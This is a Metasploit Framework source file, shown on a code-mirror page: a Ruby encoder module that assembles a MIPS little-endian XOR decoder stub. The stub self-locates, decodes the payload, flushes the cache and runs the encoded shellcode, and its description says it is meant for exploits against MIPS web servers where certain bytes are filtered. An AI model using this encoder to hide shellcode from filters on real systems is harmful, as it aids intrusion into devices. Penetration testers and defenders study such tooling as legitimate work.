Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/encoders/mipsle/byte_xori.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasm'

7


8
class MetasploitModule < Msf::Encoder::Xor

9
  Rank = NormalRanking

10


11
  def initialize

12
    super(

13
      'Name' => 'Byte XORi Encoder',

14
      'Description' => %q{

15
        Mips Web server exploit friendly xor encoder. This encoder has been found useful on

16
        situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS

17
        architectures, this one is based on the xori instruction.

18
      },

19
      'Author' => [

20
        'Julien Tinnes <julien[at]cr0.org>', # original longxor encoder, which this one is based on

21
        'juan vazquez',                      # byte_xori encoder

22
        'Pedro Ribeiro <[email protected]>',  # fix for Linux >= 2.6.11 (set up cacheflush() args properly)

23
      ],

24
      'Arch' => ARCH_MIPSLE,

25
      'License' => MSF_LICENSE,

26
      'Decoder' => {

27
        'KeySize' => 1,

28
        'BlockSize' => 1,

29
        'KeyPack' => 'C'

30
      })

31
  end

32


33
  #

34
  # Returns the decoder stub that is adjusted for the size of the buffer

35
  # being encoded.

36
  #

37
  def decoder_stub(state)

38
    # add 4 number of passes  for the space reserved for the key, at the end of the decoder stub

39
    # (see commented source)

40
    number_of_passes = state.buf.length + 4

41
    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if number_of_passes > 32766

42


43
    # 16-bits not (again, see also commented source)

44
    reg_14 = (number_of_passes + 1) ^ 0xFFFF

45
    reg_5 = state.buf.length ^ 0xFFFF

46


47
    decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), <<~EOS).encoded.data

48
      main:

49


50
      li macro reg, imm

51
        addiu reg, $0, imm                     ; 0xYYYYXX24 - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff

52
      endm

53


54
        li      ($14, #{reg_14})               ; 0xXXXX0e24 - store in $14 the number of passes (two's complement) - xxxx (number of passes)

55
        nor     $14, $14, $0                   ; 0x2770c001 - get in $14 the number of passes

56
        li      ($11,-84)                      ; 0xacff0b24 - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)

57


58
      ; acts as getpc

59
      next:

60
        bltzal  $8, next                       ; 0xffff1005 - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.

61
        slti    $8, $0, 0x#{slti_imm(state)}   ; 0xXXXX0828 - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm

62


63
        nor     $11, $11, $0                   ; 0x27586001 - get in $11 the offset to the end of the decoder (from the addu instr)

64
        addu    $25, $31, $11                  ; 0x21c8eb03 - get in $25 a pointer to the end of the decoder stub

65
        addu	  $16, $31, $11		               ; $16 too (used to set up the cacheflush() arg down below)

66


67
        slti    $23, $0, 0x#{slti_imm(state)}  ; 0xXXXX1728 - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm

68
        lb      $17, -1($25)                   ; 0xffff3183 - Load xor key in $17 (stored on the last byte of the decoder stub)

69


70
      ; Init $6 and $15

71
        li      ($13, -4)                      ; 0xfcff0d24 - $13 = -4

72
        nor     $6, $13, $0                    ; 0x2730a001 - $6 = 3 ; used to easily get the cacheflush parameter

73
        addi    $15, $6, -2                    ; 0xfeffcf20 - $15 = 1 ($15 = decoding loop counter increment)

74


75
      ; In order avoid null bytes, decode also the xor key, so memory can be

76
      ; referenced with offset -1

77
      loop:

78
        lb      $8, -4($25)                    ; 0xfcff2883 - Load in $8 the byte to decode

79
        addu    $23, $23, $15                  ; 0x21b8ef02 - Increment the counter ($23)

80
        xori    $3, $8, 0x#{padded_key(state)} ; 0xf2610339 - xori decoding instruction, store the decoded byte on $3

81
        #{set_on_less_than(state)}             ; 0xXXf0ee02 - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt

82
        sb      $3, -4($25)                    ; 0xfcff23a3 - Store decoded byte on memory

83
        bne     $0, $30, loop                  ; 0xfaffc017 - branch to loop if $30 != 0 (ranch while bytes to decode)

84
        addu    $25, $25, $15                  ; 0x21c82f03 - next instruction to decode, executed because of the pipelining

85


86
        addiu	$4, $16, -4                      ; cacheflush() addr parameter

87
        li(      $10,#{reg_5})                 ; cacheflush() nbytes parameter

88
        nor   $5, $10, $0                      ; same as above

89


90
        li      ($2, 4147)                     ; 0x33100224 - cacheflush system call

91
        syscall 0x52950                        ; 0x0c544a01

92
        nop                                    ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop

93
    EOS

94


95
    return decoder

96
  end

97


98
  def padded_key(state, size = 1)

99
    key = Rex::Text.rand_text(size, state.badchars)

100
    key << [state.key].pack('C')

101
    return key.unpack('n')[0].to_s(16)

102
  end

103


104
  # Returns an two-bytes immediate value without badchars. The value must be

105
  # on the 0x8000-0x8fff so it is used as negative value by slti (set less

106
  # than signed immediate)

107
  def slti_imm(state)

108
    imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack('C*'))

109
    return imm.unpack('n')[0].to_s(16)

110
  end

111


112
  # Since 0x14 contains the number of passes, and because of the li macro, can't be

113
  # longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used

114
  # here

115
  def set_on_less_than(state)

116
    instructions = {

117
      'sltu   $30, $23, $14' => "\x2b\xf0\xee\x02", # set less than unsigned

118
      'slt    $30, $23, $14' => "\x2a\xf0\xee\x02"  # set less than

119
    }

120


121
    instructions.each do |k, v|

122
      if Rex::Text.badchar_index(v, state.badchars).nil?

123
        return k

124
      end

125
    end

126


127
    raise BadcharError.new,

128
          "The #{name} encoder failed to encode the decoder stub without bad characters.",

129
          caller

130
  end

131


132
  def encode_finalize_stub(state, stub)

133
    # Including the key into the stub by ourselves because it should be located

134
    # in the last 4 bytes of the decoder stub. In this way decoding will convert

135
    # these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports

136
    # one decoder_key_offset position

137
    real_key = state.key

138
    stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

139
    stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

140
    stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

141
    stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)

142
    return stub

143
  end

144
end

145


146